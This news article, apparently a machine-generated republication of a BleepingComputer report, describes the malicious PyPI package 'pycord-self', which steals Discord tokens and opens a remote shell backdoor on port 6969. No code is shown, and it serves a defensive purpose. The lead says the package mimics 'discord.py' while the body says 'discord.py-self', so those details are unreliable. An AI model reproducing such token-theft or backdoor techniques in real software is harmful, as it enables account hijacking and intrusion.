Ethical Hacking News
Malicious PyPi package steals Discord auth tokens from devs, according to a recent security report by code security company Socket, a malicious Python package has been found on the popular open-source package index PyPI. The package, named 'pycord-self,' mimics a highly popular project called 'discord.py' that is used by developers to control accounts programmatically and allows communication with Discord's user API.
A malicious PyPi package named 'pycord-self' is stealing Discord auth tokens and planting a backdoor for remote control.The package mimics a popular legitimate project with nearly 28 million downloads, offering similar functionality.The malicious package was added to PyPI last year in June and has been downloaded 885 times so far.It steals Discord authentication tokens and sends them to an external URL, allowing attackers to hijack the developer's account.The package also sets up a stealthy backdoor mechanism, creating a persistent connection to a remote server through port 6969.Attackers can use the stolen token to gain continuous access to the victim's system and launch a shell command.Software developers are advised to avoid installing packages without checking their authenticity and scanning for suspicious functions.
Malicious PyPi package steals Discord auth tokens from devs
A malicious package named 'pycord-self' on the Python package index (PyPI) targets Discord developers to steal authentication tokens and plant a backdoor for remote control over the system.
The package mimics the highly popular 'discord.py-self,' which has nearly 28 million downloads, and even offers the functionality of the legitimate project.
The official package is a Python library that allows communication with Discord's user API and permits developers to control accounts programmatically.
It is typically used for messaging and automating interactions, creating bots, scripting automated moderation, notifications or responses, and running commands or retrieving data from Discord without a bot account.
According to code security company Socket, the malicious package was added to PyPI last year in June and has been downloaded 885 times so far.
At the time of writing, the package is still available on PyPI from a publisher that had its details verified by the platform.
The malicious package on PyPISource: BleepingComputer
Token theft and persistent access
Socket researchers analyzed the malicious package and found that pycord-self contains code that performs two main things. One is stealing Discord authentication tokens from the victim and sending them to an external URL.
Code to grab the Discord tokenSource: Socket
Attackers can use the stolen token to hijack the developer's Discord account without needing the access credentials, even if two-factor authentication protection is active.
The second function of the malicious package is to set up a stealthy backdoor mechanism by creating a persistent connection to a remote server through port 6969.
"Depending on the operating system, it launches a shell ("bash" on Linux or "cmd" on Windows) that grants the attacker continuous access to the victim's system," explains Socket in the report.
"The backdoor runs in a separate thread, making it difficult to detect while the package continues to appear functional."
Setting up a backdoor on the machineSource: Socket
Software developers are advised to avoid installing packages without checking that the code comes from the official author, especially if it's a popular one. Verifying the name of the package can also lower the risk of falling victim of typosquatting.
When working with open-source libraries, it is advisable to review the code for suspicious functions, if possible, and avoid anything that appears obfuscated. Additionally, scanning tools may help with detecting and blocking malicious packages.
Related Articles:
MFA Failures - The Worst is Yet to ComeOver 4,000 backdoors hijacked by registering expired domainsHackers exploit KerioControl firewall flaw to steal admin CSRF tokensOver 3.1 million fake "stars" on GitHub projects used to boost rankingsMicrosoft issues urgent dev warning to update .NET installer link
Related Information:
https://www.bleepingcomputer.com/news/security/malicious-pypi-package-steals-discord-auth-tokens-from-devs/
Published: Fri Jan 17 16:27:53 2025 by llama3.2 3B Q4_K_M
